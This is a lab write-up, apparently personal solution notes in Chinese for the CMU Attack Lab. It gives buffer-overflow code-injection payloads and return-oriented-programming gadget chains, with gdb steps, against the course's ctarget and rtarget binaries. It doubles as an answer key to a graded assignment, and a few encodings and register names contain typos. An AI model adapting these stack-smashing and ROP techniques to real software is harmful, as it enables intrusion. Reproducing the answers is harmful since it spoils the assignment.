part1:
    注意:
        小端法输入数字, 执行ctarget时加入-q参数, 阻止连接到cmu的服务器, 由于不是cmu的主机, 因此无法连接cmu
    level1:
        0x4017a8: getbuf
        0x4017c0: touch1
        touch clevel1.txt
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        c0 17 40 00 00 00 00 00
        ./hex2raw < clevel1.txt | ./ctarget -q
    level2:
        touch clevel2.txt
        0x4017ec: touch2
        0x59b997fa: cookie
        gdb ctarget
        disas getbuf
        break * 0x4017ac
        run -q
        print /x $rsp
        $rsp: 0x5561dc78
        quit
        vim asm_clevel2.s
        movq $0x59b997fa, %rdi
        push $0x4017ec
        ret
        gcc -c asm_clevel2.s
        objdump -d asm_clevel2.o > asm_clevel2.txt
        48 c7 c7 fa 97 b9 59 68
        ec 17 40 00 c3 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        78 dc 61 55 00 00 00 00
        ./hex2raw < clevel2.txt | ./ctarget -q
    level3:
        touch clevel3.txt
        0x4018fa: touch3
        gdb ctarget
        disas test
        break * 0x40196c
        run -q
        print /x $rsp
        $rsp: 0x5561dca8
        quit
        vim asm_clevel3.s
        movq $0x5561dca8, %rdi
        pushq $0x4018fa
        ret
        gcc -c asm_clevel3.s
        objdump -d asm_clevel3.o > asm_clevel3.txt
        0x59b997fa: 35 39 62 39 39 37 66 61
        48 c7 c7 a8 dc 61 55 68
        fa 18 40 00 c3 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        78 dc 61 55 00 00 00 00
        35 39 62 39 39 37 66 61
        ./hex2raw < clevel3.txt | ./ctarget -q
part2:
    level2:
        touch rlevel2.txt
        0x4019cc: 58 90 c3
        00000000004019ca <getval_280>:
        4019ca:   b8 29 58 90 c3          mov    $0xc3905829,%eax
        4019cf:   c3                      retq
        0x4019a2: 48 89 c7 c3
        00000000004019a0 <addval_273>:
        4019a0:   8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax
        4019a6:   c3                      retq
        0x4017ec: touch2
        0x59b997fa: cookie
        popq: %rax 58
        nop: 90
        ret: c3
        movq %rax, %rdi: 48 89 97
        ret: c3
        vim rlevel2.txt
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        cc 19 40 00 00 00 00 00
        fa 97 b9 59 00 00 00 00
        a2 19 40 00 00 00 00 00
        ec 17 40 00 00 00 00 00
        ./hex2raw < rlevel2.txt | ./rtarget -q
    level3:
        movq %rsp, %rax
        movq %rax, %rdi
        popq %rax
        movl %eax, %edx
        movl %edx, %ecx
        movl %ecx, %esi
        callq 0x4019d6<add_xy>
        movq $rsp, %rdi
        vim rlevel3.txt
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00
        06 1a 40 00 00 00 00 00     /* addval_190: movq %rsp, %rax */
        a2 19 40 00 00 00 00 00     /* addval_273: movq %rax, %rdi */
        ab 19 40 00 00 00 00 00     /* addval_219: popq %rax */
        48 00 00 00 00 00 00 00     /* 偏移地址 */
        dd 19 40 00 00 00 00 00     /* getval_481: movl %eax, %edx */
        69 1a 40 00 00 00 00 00     /* getval_311: movl %edx, %ecx */
        13 1a 40 00 00 00 00 00     /* addval_436: movl %ecx, %six */
        d6 19 40 00 00 00 00 00     /* 调用add_xy */
        c5 19 40 00 00 00 00 00     /* setval_426: movq %rax, %rdi */
        fa 18 40 00 00 00 00 00     /* touch3的地址 */
        35 39 62 39 39 37 66 61     /* cookie: 0x59b997fa */
        ./hex2raw < rlevel3.txt | ./rtarget -q
